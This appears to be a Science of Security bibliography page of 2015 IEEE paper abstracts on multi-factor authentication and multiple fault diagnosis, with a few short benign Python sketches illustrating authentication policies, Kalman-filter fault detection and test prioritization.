URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7382287&isnumber=7381900

 

van der Haar, D., "CaNViS: A Cardiac and Neurological-Based Verification System that uses Wearable Sensors," in Digital Information, Networking, and Wireless Communications (DINWC), 2015 Third International Conference on , pp. 99-104, 3-5 Feb. 2015. doi: 10.1109/DINWC.2015.7054225

Abstract: The prevalence of portable physiological sensors in the medical, lifestyle and security fields has ushered in more viable biometric attributes that can be used for the task of identification and authentication. The portability of these sensors also makes systems that require more than one signal source feasible and practical. Once these biological signals are captured, they can be combined for the purposes of authentication. This study proposes such a multi-factor biometric system, fusing cardiac and neurological components captured with an electrocardiograph (ECG) and an electroencephalograph (EEG), respectively, and using them as a biometric attribute. Representing each of these components in a common format and fusing them at the feature level allows one to create a novel biometric system that is interoperable with different biological signal sources. The results indicate the system achieves sufficient false rejection (FRR) and false acceptance (FAR) rates. The results also show there is value in implementing multi-factor biological-signal-based biometric systems using wearable sensors.

Keywords: biometrics (access control); electrocardiography; electroencephalography; medical signal processing; CaNViS; ECG; EEG; biological signal source; cardiac and neurological-based verification system; cardiac component; electrocardiograph; electroencephalograph; false acceptance rate; false rejection rate; multifactor biological signal; multifactor biometric system; neurological component; wearable sensors; Authentication; Biometrics (access control); Biosensors; Electrocardiography; Electroencephalography; Feature extraction; Authentication; Biometric Fusion; Biometrics; Wearable Computing (ID#: 16-9171)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7054225&isnumber=7054206

 

Haider, S.K.; Ahmad, M.; Hijaz, F.; Patni, A.; Johnson, E.; Seita, M.; Khan, O.; van Dijk, M., "M-MAP: Multi-factor Memory Authentication for Secure Embedded Processors," in Computer Design (ICCD), 2015 33rd IEEE International Conference on, pp. 471-474, 18-21 Oct. 2015. doi: 10.1109/ICCD.2015.7357151

Abstract: The challenges faced in securing embedded computing systems against multifaceted memory safety vulnerabilities have prompted great interest in the development of memory safety countermeasures. These countermeasures either provide protection only against their corresponding type of vulnerabilities, or incur substantial architectural modifications and overheads in order to provide complete safety, which makes them infeasible for embedded systems. In this paper, we propose M-MAP: a comprehensive system based on multi-factor memory authentication for complete memory safety. We examine certain crucial implications of composing memory integrity verification and bounds checking schemes in a comprehensive system. Based on these implications, we implement M-MAP with hardware based memory integrity verification and software based bounds checking to achieve a balance between hardware modifications and performance. We demonstrate that M-MAP implemented on top of a lightweight out-of-order processor delivers complete memory safety with only 32% performance overhead on average, while incurring minimal hardware modifications, and area overhead.

Keywords: embedded systems; security of data; storage management chips; M-MAP; embedded computing systems; hardware modifications; memory safety countermeasures; multifaceted memory safety vulnerabilities; multifactor memory authentication; secure embedded processors; Benchmark testing; Computer architecture; Hardware; Program processors; Random access memory; Safety (ID#: 16-9172)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357151&isnumber=7357071

 

Gepko, I., "General Requirements and Security Architecture for Mobile Phone Anti-Cloning Measures," in EUROCON 2015 - International Conference on Computer as a Tool (EUROCON), IEEE, pp. 1-6, 8-11 Sept. 2015. doi: 10.1109/EUROCON.2015.7313666

Abstract: The impressive number of counterfeit and stolen mobile phones, as well as the emergence of applications where authentication of the mobile terminal is needed, shows the critical importance of reliable protection of the mobile device identity. Counterfeiters may use identifiers allocated to genuine handsets for their products. Moreover, forgery of the International Mobile Equipment Identity (IMEI) is not too difficult for most existing smartphones, as their software, which is the last source of the IMEI before it is sent to the network, is vulnerable to modification. In this paper we argue that there is a need to develop an anti-cloning tool for mobile devices whose efficacy does not depend on manufacturers. The basic requirements for the novel security architecture are formulated. We introduce a "provable experience" authentication factor for the mobile device, which is dual to the "social network" authentication factor of the user. Based on this, a novel method of multi-factor authentication of the mobile device is proposed, which allows effective blocking of clones in cellular networks and does not require standardization or changes in mobile device construction.

Keywords: security of data; smart phones; social networking (online); IMEI; anticloning tool; cellular networks; counterfeit mobile phones; genuine handsets; international mobile equipment identity; mobile device identity; mobile phone anticloning measures; mobile terminal authentication; multifactor mobile device authentication; provable experience authentication factor; security architecture; smartphones; social network authentication factor; Authentication; Mobile communication; Mobile computing; Mobile handsets; Software; IMEI; authentication factor; identity; mobile device; multi-factor authentication; security (ID#: 16-9173)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7313666&isnumber=7313653

 

Lupu, C.; Gaitan, V.-G.; Lupu, V., "Fingerprints Used for Security Enhancement of Online Banking Authentication Process," in Electronics, Computers and Artificial Intelligence (ECAI), 2015 7th International Conference on, pp. 217-220, 25-27 June 2015. doi: 10.1109/ECAI.2015.7301177

Abstract: Online banking services have become one of the most important applications on the Internet, being provided by most banks all over the world. The end-user can manage accounts or make payments without being forced to go to a physical bank office. That is why security concerns regarding authentication have to be taken into account, and the bank should provide various and combined methods for login in order to increase confidence in its services. In other words, the bank should provide multi-factor authentication. This paper presents a model for user enrollment and authentication using three basic methods, based on: what the user knows (a username), what the user has (a digipass), and an intrinsic characteristic of the user, e.g., a fingerprint. Combining these three characteristics leads to a great security improvement in authentication or order signing. Classical methods are based only on the first two characteristics (what the user knows and has), without the most habitual one, which cannot be lost or stolen: an intrinsic characteristic of the user, like a fingerprint or an iris. This paper also presents an application for user enrollment, developed during our research, that can be used in the bank-side environment.

Keywords: Internet; bank data processing; message authentication; retail data processing; Internet; digipass; end-user; fingerprints; intrinsic characteristic; multifactor authentication; online banking services; order signing; security enhancement; security improvement; user authentication; user enrollment; username; Authentication; Fingerprint recognition; Iris recognition; Online banking; biometrics; enrollment; online banking; process flowchart; security (ID#: 16-9174)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7301177&isnumber=7301133

 

Fathi, R.; Salehi, M.A.; Leiss, E.L., "User-Friendly and Secure Architecture (UFSA) for Authentication of Cloud Services," in Cloud Computing (CLOUD), 2015 IEEE 8th International Conference on, pp. 516-523, June 27 2015-July 2 2015. doi: 10.1109/CLOUD.2015.75

Abstract: Clouds are becoming prevalent service providers because of their low upfront costs, rapid application deployment, and high scalability. Many users outsource their sensitive data and services to cloud providers. Users frequently access these sensitive services through devices and connections that are vulnerable to theft and eavesdropping. Therefore, users urgently need robust security measures to protect the privacy of their data and services in clouds. In particular, robust authentication techniques are demanded by users for safe access to cloud services. One technique is to utilize multiple authentication factors (a.k.a. multi-factor authentication) to access cloud services. However, the challenge is that the multi-factor authentication technique is not effective as it causes user frustration and fatigue. To address this challenge, in this study, we propose a multi-factor authentication architecture that aims at minimizing the perceived authentication hardship for cloud users while improving the security of the authentication. To achieve this goal, our authentication architecture suggests a progressive manner of leveraging access to different levels of cloud services. At each level, the architecture asks for authentication factors by considering the perceived hardship for users. To increase security and user convenience, the architecture also considers implicit authentication factors in addition to the explicit factors. Our evaluation results indicate that authentication using the proposed architecture decreases the users' perceived hardship by up to 29% compared with other methods. The results also reveal that our proposed architecture adapts the authentication difficulty based on the user's condition.

Keywords: cloud computing; data protection; message authentication; software architecture; UFSA; cloud providers; cloud service authentication; cloud service privacy; data privacy; data protection; explicit authentication factors; implicit authentication factors; multifactor authentication technique; multiple authentication factors; robust authentication techniques; robust security measures; user-friendly and secure architecture; Authentication; Computer architecture; Engines; Mathematical model; Mobile handsets; Sensitivity; Cloud services; Multi-factor Authentication; Sand-boxing; User-friendly authentication (ID#: 16-9175)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7214085&isnumber=7212169
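
To illustrate the progressive scheme described above, here is a small Python sketch in which cheap implicit factors unlock low-sensitivity services while higher levels demand explicit factors. The factor names, weights, and level thresholds are assumptions for illustration, not the paper's actual parameters.

```python
# Illustrative progressive multi-factor policy: sum hardship-aware factor
# scores and compare against the threshold of the requested service level.
FACTOR_WEIGHTS = {
    "known_device": 1.0,    # implicit: no user effort
    "usual_location": 1.0,  # implicit
    "password": 2.0,        # explicit
    "otp": 3.0,             # explicit
    "fingerprint": 3.0,     # explicit
}
LEVEL_THRESHOLDS = {1: 2.0, 2: 4.0, 3: 6.0}  # assumed sensitivity levels

def authorized(presented_factors, service_level):
    """Grant access when the summed factor score meets the level's threshold."""
    score = sum(FACTOR_WEIGHTS.get(f, 0.0) for f in presented_factors)
    return score >= LEVEL_THRESHOLDS[service_level]

# A user on a known device reading low-sensitivity data needs nothing else;
# a high-sensitivity operation (level 3) forces an explicit second factor.
print(authorized({"known_device", "usual_location"}, 1))   # True
print(authorized({"known_device", "password"}, 3))         # False
print(authorized({"known_device", "password", "otp"}, 3))  # True
```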

 

Khan, S.H.; Akbar, M.A., "Multi-Factor Authentication on Cloud," in Digital Image Computing: Techniques and Applications (DICTA), 2015 International Conference on, pp. 1-7, 23-25 Nov. 2015

doi: 10.1109/DICTA.2015.7371288

Abstract: Due to recent security infringement incidents involving single-factor authentication services, there is an inclination towards the use of multi-factor authentication (MFA) mechanisms. These MFA mechanisms should be available on modern hand-held computing devices like smart phones due to their big share of the computational devices market. Moreover, their high social acceptability and ubiquitous nature have attracted enterprises to offer their services on modern hand-held devices. In this regard, the big challenge for these enterprises is to ensure the security and privacy of users. To address this issue, we have implemented a verification system that combines a human inherence factor (handwritten signature biometrics) with the standard knowledge factor (user-specific passwords) to achieve a high level of security. The major computational load of the aforementioned task is shifted to a cloud-based application server so that a platform-independent user verification service with ubiquitous access becomes possible. Custom applications are built for both iOS and Android based devices, which are linked with the cloud-based two-factor authentication (TFA) server. The system was tested on-the-run by a diverse group of users and 98.4% signature verification accuracy was achieved.

Keywords: cloud computing; data privacy; message authentication; ubiquitous computing; Android based device; cloud based application server; hand-held computing device; handwritten signature biometrics; human inherence factor; iOS; multifactor authentication; security infringement; signature verification; single factor authentication service; smart phone; two factor authentication server; user privacy; user security; Authentication; Biometrics (access control); Hidden Markov models; Performance evaluation; Servers; Smart phones (ID#: 16-9176)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371288&isnumber=7371204


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Multiple Fault Diagnosis 2015

 

 
SoS Logo

Multiple Fault Diagnosis 2015

 

According to Shakeri, “the computational complexity of solving the optimal multiple-fault isolation problem is super exponential.”  Most processes and procedures assume that there will be only one fault at any given time.  Many algorithms are designed to do sequential diagnostics.  With the growth of cloud computing and multicore processors and the ubiquity of sensors, the problem of multiple fault diagnosis has grown even larger.  For the Science of Security community, multiple fault diagnosis is relevant to cyber physical systems, resiliency, metrics, and human factors.  The work cited here was presented in 2015.


Zhang Ke; Chai Yi; Liu Jianhuan; Feng Xiaohui, "Analysis of Class Group Distinguishing Based Conceptual Models for Multiple Fault Diagnosis," in Control Conference (CCC), 2015 34th Chinese, pp. 6397-6402, 28-30 July 2015. doi: 10.1109/ChiCC.2015.7260647

Abstract: It is common for multiple faults to exist in actual engineering and complex systems. Because the parameters of multiple faults are tightly coupled, the relationship between the fault mode and known mono-fault features is non-linear. Thus, it is hard to draw distinctions within the "fault to symptom" mapping set. In this case, there is no guarantee that traditional diagnosis methods for mono-faults meet the demands. Given this requirement, an analysis of the traits of multiple faults is made. A summarization is given of class group distinguishing (CGD) based methods applied in fault diagnosis. Major defects in these methods as applied to multiple fault diagnosis are analyzed. On that basis, fault modes and symptoms are taken as key points. Conceptual models for multiple fault diagnosis based on CGD are gradually explored. With the models, actual faults can be mapped to one or more known mono-faults via distinguishing analysis, and therefore multiple faults can be diagnosed. Four kinds of flow chart and construction for the models are established. The advantages and disadvantages of each model are presented separately at the end of the chapter.

Keywords: fault diagnosis; pattern classification; pattern clustering; uncertainty handling; CGD based methods; class group distinguishing based conceptual models; fault to symptom; monofault features; multiple fault diagnosis; uncertainty reasoning; Analytical models; Automation; Cognition; Couplings; Fault diagnosis; Support vector machines; Uncertainty; Class Group Distinguishing; Classification; Cluster; Conceptual Models; Fault Diagnosis; Multiple Fault (ID#: 16-9213)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7260647&isnumber=7259602

 

Irita, T.; Namerikawa, T., "Decentralized Fault Detection of Multiple Cyber Attacks in Power Network via Kalman Filter," in Control Conference (ECC), 2015 European, pp. 3180-3185, 15-17 July 2015.

doi: 10.1109/ECC.2015.7331023

Abstract: This paper discusses a fault diagnosis method for multiple cyber attacks in networked electrical power systems. We deal with a power network of a centralized system, in which some parameters are estimated by a Kalman filter. Using a sensor network system, each sensor node can exchange information by wireless communication. A fault diagnosis method is proposed using both a fault detection diagnosis matrix and a fault distinction matrix. The former is composed of estimated values and observed values, while the latter is composed of observed values and values calculated via the sensor network. Finally, the effectiveness of the proposed approach is validated by a simulation experiment.

Keywords: Kalman filters; fault diagnosis; matrix algebra; power system faults; power system parameter estimation; power system security; wireless sensor networks; Kalman filter; decentralized fault detection diagnosis matrix; fault distinction matrix; faults diagnosis method; information exchange; multiple cyber attacks; networked electrical power systems; parameter estimation; power network; sensor network system; sensor nodes; wireless communication; Fault detection; Generators; Kalman filters; Mathematical model; Power grids; Power system dynamics; Rotors (ID#: 16-9214)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7331023&isnumber=7330515
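
The residual test behind Kalman-filter-based fault detection can be illustrated in a few lines of numpy: estimate a scalar state and flag a fault when the innovation (measurement minus prediction) exceeds a 3-sigma bound. The model, noise levels, and injected sensor bias below are assumed for the example and are not taken from the paper.

```python
# Scalar Kalman filter with a chi-square test on the innovation.
import numpy as np

rng = np.random.default_rng(0)
a, q, r = 1.0, 0.01, 0.25    # state transition, process and measurement noise
x_hat, p = 0.0, 1.0          # initial estimate and covariance
true_x = 0.0

for k in range(60):
    true_x = a * true_x + rng.normal(0, np.sqrt(q))
    z = true_x + rng.normal(0, np.sqrt(r))
    if k >= 40:
        z += 3.0                       # injected sensor bias fault

    x_pred = a * x_hat                 # predict
    p_pred = a * p * a + q
    nu = z - x_pred                    # innovation
    s = p_pred + r                     # innovation variance
    if nu ** 2 / s > 9.0:              # 3-sigma test on the residual
        print(f"step {k}: fault flagged (normalized residual {nu ** 2 / s:.1f})")
    kg = p_pred / s                    # update
    x_hat = x_pred + kg * nu
    p = (1 - kg) * p_pred
```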

 

Meera, G.; Geethakumari, G., "A Provenance Auditing Framework for Cloud Computing Systems," in Signal Processing, Informatics, Communication and Energy Systems (SPICES), 2015 IEEE International Conference on, pp. 1-5, 19-21 Feb. 2015. doi: 10.1109/SPICES.2015.7091427

Abstract: Cloud computing is a service oriented paradigm that aims at sharing resources among a massive number of tenants and users. This sharing facility, coupled with the sheer number of users, makes cloud environments susceptible to major security risks. Hence, security and auditing of cloud systems is of great relevance. Provenance is a meta-data history of objects which aids in verifiability, accountability and lineage tracking. Incorporating provenance into cloud systems can help in fault detection. This paper proposes a framework which aims at performing secure provenance audits of clouds across applications and multiple guest operating systems. For integrity preservation and verification, we use established cryptographic techniques. We look at it from the cloud service providers' perspective, as improving cloud security can result in better trust relations with customers.

Keywords: auditing; cloud computing; cryptography; data integrity; fault diagnosis; meta data; resource allocation; service-oriented architecture; trusted computing; accountability; cloud computing systems; cloud environments; cloud security; cloud service providers; cryptographic techniques; fault detection; integrity preservation; integrity verification; lineage tracking; metadata history; operating systems; provenance auditing framework; resource sharing; security risks; service oriented paradigm; sharing facility; trust relations; verifiability; Cloud computing; Cryptography; Digital forensics; Monitoring; Virtual machining; Auditing; Cloud computing; Provenance (ID#: 16-9215)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7091427&isnumber=7091354

 

Sousa, B.; Pentikousis, K.; Curado, M., "Multihoming Aware Optimization Mechanism," in Integrated Network Management (IM), 2015 IFIP/IEEE International Symposium on, pp. 1085-1091, 11-15 May 2015. doi: 10.1109/INM.2015.7140437

Abstract: Network management includes several operations that aim to maximize Fault, Configuration, Account, Performance and Security (FCAPS) goals. Performance improvement often relies on multiple criteria, leading to NP-Hard optimisation problems. Very often, optimization mechanisms are narrowed to a specific scenario or present deployment issues due to their associated complexity. Others, despite reducing complexity, have accuracy issues that lead to the selection of non-optimal solutions. MeTHODICAL is an accurate optimisation technique for path selection in multihoming scenarios that enhances network management FCAPS goals by being flexible enough to operate on distinct scenarios, supporting different applications and services and with reduced deployment complexity.

Keywords: communication complexity; fault diagnosis; optimisation; performance evaluation; telecommunication network management; telecommunication security; FCAPS goal; NP-hard optimisation problem; deployment complexity; fault configuration account performance and security goal; multihoming aware optimization mechanism; multihoming scenario; network management; path selection; performance improvement; Accuracy; Codecs; NP-hard problem; Optimization; Resilience; Servers; FCAPS; Multihoming; optimization; resilience (ID#: 16-9216)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7140437&isnumber=7140257

 

Marijan, D., "Multi-perspective Regression Test Prioritization for Time-Constrained Environments," in Software Quality, Reliability and Security (QRS), 2015 IEEE International Conference on, pp. 157-162, 3-5 Aug. 2015. doi: 10.1109/QRS.2015.31

Abstract: Test case prioritization techniques are widely used to enable reaching certain performance goals during regression testing faster. A commonly used goal is high fault detection rate, where test cases are ordered in a way that enables detecting faults faster. However, for optimal regression testing, there is a need to take into account multiple performance indicators, as considered by different project stakeholders. In this paper, we introduce a new optimal multi-perspective approach for regression test case prioritization. The approach is designed to optimize regression testing for faster fault detection integrating three different perspectives: business perspective, performance perspective, and technical perspective. The approach has been validated in regression testing of industrial mobile device systems developed in continuous integration. The results show that our proposed framework efficiently prioritizes test cases for faster and more efficient regression fault detection, maximizing the number of executed test cases with high failure frequency, high failure impact, and cross-functional coverage, compared to manual practice.

Keywords: fault diagnosis; program testing; regression analysis; business perspective; continuous integration; cross-functional coverage; failure frequency; failure impact; fault detection rate; industrial mobile device system; multiperspective regression test prioritization; optimal multiperspective approach; optimal regression testing; performance indicator; performance perspective; regression fault detection; regression test case prioritization; technical perspective; test case prioritization technique; time-constrained environment; Business; Fault detection; Manuals; Software; Testing; Time factors; Time-frequency analysis; regression testing; software testing; test case prioritization (ID#: 16-9217)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7272927&isnumber=7272893
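
The core of a multi-perspective prioritization can be sketched as a weighted sum over per-test indicators drawn from the business, performance, and technical perspectives. The weights and sample data below are assumptions for illustration, not the paper's model.

```python
# Order tests by a weighted combination of three perspective scores.
tests = [
    # (name, failure_frequency, failure_impact, cross_functional_coverage)
    ("t_login",    0.9, 0.8, 0.3),
    ("t_payment",  0.4, 1.0, 1.0),
    ("t_settings", 0.2, 0.3, 0.6),
    ("t_search",   0.7, 0.5, 0.4),
]
weights = (0.4, 0.4, 0.2)   # business, performance, technical perspectives

def priority(t):
    _, freq, impact, coverage = t
    return weights[0] * freq + weights[1] * impact + weights[2] * coverage

for name, *_ in sorted(tests, key=priority, reverse=True):
    print(name)   # t_payment, t_login, t_search, t_settings
```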

 

Pomeranz, I., "Improving the Accuracy of Defect Diagnosis with Multiple Sets of Candidate Faults," in Computers, IEEE Transactions on, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TC.2015.2468234

Abstract: Given a chip that produced a faulty output response to a test set, a defect diagnosis procedure produces a set of candidate faults that is expected to identify the defects that are present in the chip. The accuracy of the set of candidate faults is higher when the set is smaller or when its overlap with the defects that are present in the chip is larger. To increase the accuracy of a set of candidate faults, this paper describes an approach where several sets of candidate faults are computed based on different subsets of the test set. The subsets are obtained by removing small numbers of tests from the complete test set. The result is sets of candidate faults that are similar but not identical. The number of sets where a fault appears yields a confidence level that the fault actually belongs in a set of candidate faults. New sets of candidate faults are defined based on the confidence levels obtained. The smallest set of candidate faults can be used as the final result of defect diagnosis, or the sets can be used for ranking the candidates. Experimental results for benchmark circuits demonstrate the effectiveness of this approach.

Keywords: Accuracy; Benchmark testing; Circuit faults; Computational modeling; Failure analysis; Fault diagnosis; Integrated circuit modeling; Candidate faults; defect diagnosis; failure analysis; testing; transition faults (ID#: 16-9218)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7194771&isnumber=4358213
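
The confidence-level idea in the abstract, rerunning diagnosis on subsets of the test set and counting how often each candidate fault reappears, can be sketched as follows; the diagnose() function is a hypothetical stand-in for a real diagnosis tool.

```python
# Count candidate-fault appearances across leave-two-out diagnosis runs.
from collections import Counter
from itertools import combinations

def diagnose(test_subset):
    """Hypothetical diagnosis returning a set of candidate fault names."""
    cands = {"f1"}              # implicated by almost any subset
    if "t3" in test_subset:
        cands.add("f7")         # implicated only when test t3 is present
    return cands

full_suite = {"t1", "t2", "t3", "t4", "t5"}
counts, runs = Counter(), 0
for removed in combinations(sorted(full_suite), 2):   # drop 2 tests per run
    counts.update(diagnose(full_suite - set(removed)))
    runs += 1

for fault, n in counts.most_common():
    print(f"{fault}: confidence {n / runs:.2f}")      # f1: 1.00, f7: 0.60
```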

 

Zhao, C.; Gao, F., "Fault Subspace Selection Approach Combined With Analysis of Relative Changes for Reconstruction Modeling and Multifault Diagnosis," in Control Systems Technology, IEEE Transactions on, vol. PP, no. 99, pp. 1-12, 2015. doi: 10.1109/TCST.2015.2464331

Abstract: Online fault diagnosis has been a crucial task for industrial processes, which in general is taken after some abnormalities have been detected. Reconstruction-based fault diagnosis has been drawing special attention as a good alternative to the traditional contribution plot. It identifies the fault cause by finding the specific reconstruction model (i.e., fault subspace) that can well eliminate alarm signals from a bunch of alternatives that have been prepared based on historical fault data. However, in practice, the abnormality may result from the joint effects of multiple faults, which thus cannot be well corrected by single-fault subspace archived in the historical fault library. In this paper, an aggregative reconstruction-based fault diagnosis strategy is proposed to handle the case where multiple-fault causes jointly contribute to the abnormal process behaviors. First, fault subspaces are extracted based on historical fault data in two different monitoring subspaces where analysis of relative changes is taken to enclose the major fault effects that are responsible for different alarm monitoring statistics. Then, a fault subspace selection strategy is developed to analyze the combinatorial fault nature that will sort and select the informative fault subspaces by evaluating their significances in data correction. Finally, an aggregative fault subspace is calculated by combining the selected fault subspaces, which represents the joint effects from multiple faults and works as the final reconstruction model for online fault diagnosis. Theoretical support is framed and the related statistical characteristics are analyzed. Its feasibility and performance are illustrated with simulated multiple faults from the Tennessee Eastman benchmark process.

Keywords: Correlation; Data models; Fault diagnosis; Joints; Libraries; Monitoring; Principal component analysis; Analysis of relative changes; fault subspace selection; joint fault effects; multifault (MF) diagnosis; reconstruction modeling (ID#: 16-9219)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7295568&isnumber=4389040
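
A small numpy sketch conveys the reconstruction step at the heart of such methods: given a faulty sample and a candidate fault subspace, remove the best-fitting fault contribution and check whether the alarm statistic drops below its limit. The data, subspace, and alarm limit are illustrative assumptions.

```python
# Reconstruction-based diagnosis with a single candidate fault direction.
import numpy as np

rng = np.random.default_rng(1)
x_normal = rng.normal(0, 0.1, size=5)      # in-control sample
xi = np.zeros((5, 1))
xi[2, 0] = 1.0                             # candidate fault direction: sensor 3
x_faulty = x_normal + 2.0 * xi[:, 0]       # sample with that fault injected
spe_limit = 0.5                            # assumed alarm threshold

def spe(x):
    """Squared prediction error used as the alarm statistic."""
    return float(x @ x)

# Least-squares fault magnitude f minimizing ||x - xi f||, then correct x.
f, *_ = np.linalg.lstsq(xi, x_faulty, rcond=None)
x_corrected = x_faulty - xi @ f

print(f"SPE before reconstruction: {spe(x_faulty):.2f}")
print(f"SPE after reconstruction:  {spe(x_corrected):.2f}")
print("candidate subspace explains the alarm:", spe(x_corrected) < spe_limit)
```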

 

Bahadorinejad, A.; Braga-Neto, U., "Optimal Fault Detection and Diagnosis in Transcriptional Circuits using Next-Generation Sequencing," in Computational Biology and Bioinformatics, IEEE/ACM Transactions on, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TCBB.2015.2404819

Abstract: We propose a methodology for model-based fault detection and diagnosis for stochastic Boolean dynamical systems indirectly observed through a single time series of transcriptomic measurements using Next Generation Sequencing (NGS) data. The fault detection consists of an innovations filter followed by a fault certification step, and requires no knowledge about the system faults. The innovations filter uses the optimal Boolean state estimator, called the Boolean Kalman Filter (BKF). In the presence of knowledge about the possible system faults, we propose an additional step of fault diagnosis based on a multiple model adaptive estimation (MMAE) method consisting of a bank of BKFs running in parallel. Performance is assessed by means of false detection and misdiagnosis rates, as well as average times until correct detection and diagnosis. The efficacy of the proposed methodology is demonstrated via numerical experiments using a p53-MDM2 negative feedback loop Boolean network with stuck-at faults that model molecular events commonly found in cancer.

Keywords: Bioinformatics; Computational biology; DNA; Fault detection; IEEE transactions; Technological innovation; Vectors; Boolean Kalman Filter; Boolean Networks; Fault Detection and Diagnosis; Next Generation Sequencing; Optimal Estimation (ID#: 16-9220)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7045509&isnumber=4359833

 

Zhou, J.; Chen, Z.; Wang, J.; Zheng, Z.; Lyu, M.R., "A Data Set for User Request Trace-Oriented Monitoring and its Applications," in Services Computing, IEEE Transactions on, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TSC.2015.2491286

Abstract: User request trace-oriented monitoring is an effective method to improve the reliability of cloud services. However, there are some difficulties in getting useful traces in practice, which hinder the development of trace-oriented monitoring research. In this paper, we release a fine-grained user request-centric open trace data set, called TraceBench, which is collected in a real-world cloud storage service deployed in a real environment. When collecting, we consider different scenarios, involving multiple scales of clusters, different kinds of user requests, various speeds of workloads, many types of injected faults, etc. To validate the usability and authenticity, we have employed TraceBench in several trace-oriented monitoring topics, such as anomaly detection, performance problem diagnosis, and temporal invariant mining. The results show that TraceBench well supports these research topics. In addition, we have also carried out an extensive data analysis based on TraceBench, which validates the high quality of the data set.

Keywords: Cloud computing; Data mining; IP networks; Instruments; Monitoring; Reliability; Servers; anomaly detection; cloud services; data set; end-to-end tracing; trace-oriented monitoring (ID#: 16-9221)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7299324&isnumber=4629387

 

Jiang, Y.; Liu, C.-C.; Diedesch, M.; Lee, E.; Srivastava, A.K., "Outage Management of Distribution Systems Incorporating Information From Smart Meters," in Power Systems, IEEE Transactions on, vol. PP, no. 99, pp. 1-11, 2015. doi: 10.1109/TPWRS.2015.2503341

Abstract: A critical function in outage management for distribution systems is to quickly detect a fault and identify the activated protective device(s). With ongoing smart grid development, numerous smart meters and fault indicators with communication capabilities provide an opportunity for accurate and efficient outage management. Using the available data, this paper proposes a new multiple-hypothesis method for identification of the faulted section on a feeder or lateral. Credibility of the multiple hypotheses is determined using the available evidence from these devices. The proposed methodology is able to handle i) multiple faults, ii) protection miscoordination, and iii) missing outage reports from smart meters and fault indicators. For each hypothesis, an optimization method based on integer programming is proposed to determine the most credible actuated protective device(s) and faulted line section(s). Simulation results based on the distribution feeders of Avista Utilities serving Pullman, WA, validate the effectiveness of the proposed approach.

Keywords: Automation; Fault location; Fuses; Smart meters; Substations; Topology; Distribution automation; fault diagnosis; fault indicator; multiple hypotheses; outage management; smart meter (ID#: 16-9222)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7352376&isnumber=4374138

 

Wang, H.; Yang, G.; Ye, D., "Fault Detection and Isolation for Affine Fuzzy Systems with Sensor Faults," in Fuzzy Systems, IEEE Transactions on, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TFUZZ.2015.2501414

Abstract: This paper investigates the fault detection and isolation (FDI) problem for a class of nonlinear systems with sensor outage faults. The considered nonlinear systems are described as affine fuzzy models, and the system outputs are chosen as the premise variables of the fuzzy models. Different from existing results, the influence of sensor faults on premise variables is considered. As a result, the well-known parallel distributed compensation (PDC) scheme cannot be used for FDI filter design. By using the structural information encoded in the fuzzy rules, the affine fuzzy system is represented by multiple operating-regime-based models in the fault-free case and faulty cases. In the multiple-model scheme, a bank of piecewise FDI filters is constructed, each of which is based on the affine fuzzy model that describes the system in the presence of a specified fault. The fault-dependent residual signals generated from the filters are used for detecting and isolating the specified fault. The FDI filter design conditions are obtained in the formulation of linear matrix inequalities (LMIs). Finally, a numerical example is given to illustrate the effectiveness and merits of the proposed method.

Keywords: Control systems; Fault detection; Fault diagnosis; Fuzzy systems; Indexes; Interpolation; Nonlinear systems; Affine fuzzy systems; fault detection and isolation; linear matrix inequalities; sensor outage faults (ID#: 16-9223)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7331302&isnumber=4358784

 

Pourbabaee, B.; Meskin, N.; Khorasani, K., "Sensor Fault Detection, Isolation, and Identification Using Multiple-Model-Based Hybrid Kalman Filter for Gas Turbine Engines," in Control Systems Technology, IEEE Transactions on, vol. PP, no. 99, pp. 1-17, 2015. doi: 10.1109/TCST.2015.2480003

Abstract: In this paper, a novel sensor fault detection, isolation, and identification (FDII) strategy is proposed using the multiple-model (MM) approach. The scheme is based on multiple hybrid Kalman filters (MHKFs), which represents an integration of a nonlinear mathematical model of the system with a number of piecewise linear (PWL) models. The proposed fault detection and isolation (FDI) scheme is capable of detecting and isolating sensor faults during the entire operational regime of the system by interpolating the PWL models using a Bayesian approach. Moreover, the proposed MHKF-based FDI scheme is extended to identify the magnitude of a sensor fault using a modified generalized likelihood ratio method that relies on the healthy operational mode of the system. To illustrate the capabilities of our proposed FDII methodology, extensive simulation studies are conducted for a nonlinear gas turbine engine. Various single and concurrent sensor fault scenarios are considered to demonstrate the effectiveness of our proposed online hierarchical MHKF-based FDII scheme under different flight modes. Finally, our proposed hybrid Kalman filter (HKF)-based FDI approach is compared with various filtering methods such as the linear, extended, unscented, and cubature Kalman filters corresponding to both interacting and noninteracting MM-based schemes. Our comparative studies confirm the superiority of our proposed HKF method in terms of promptness of the fault detection, lower false alarm rates, as well as robustness with respect to the engine health parameter degradations.

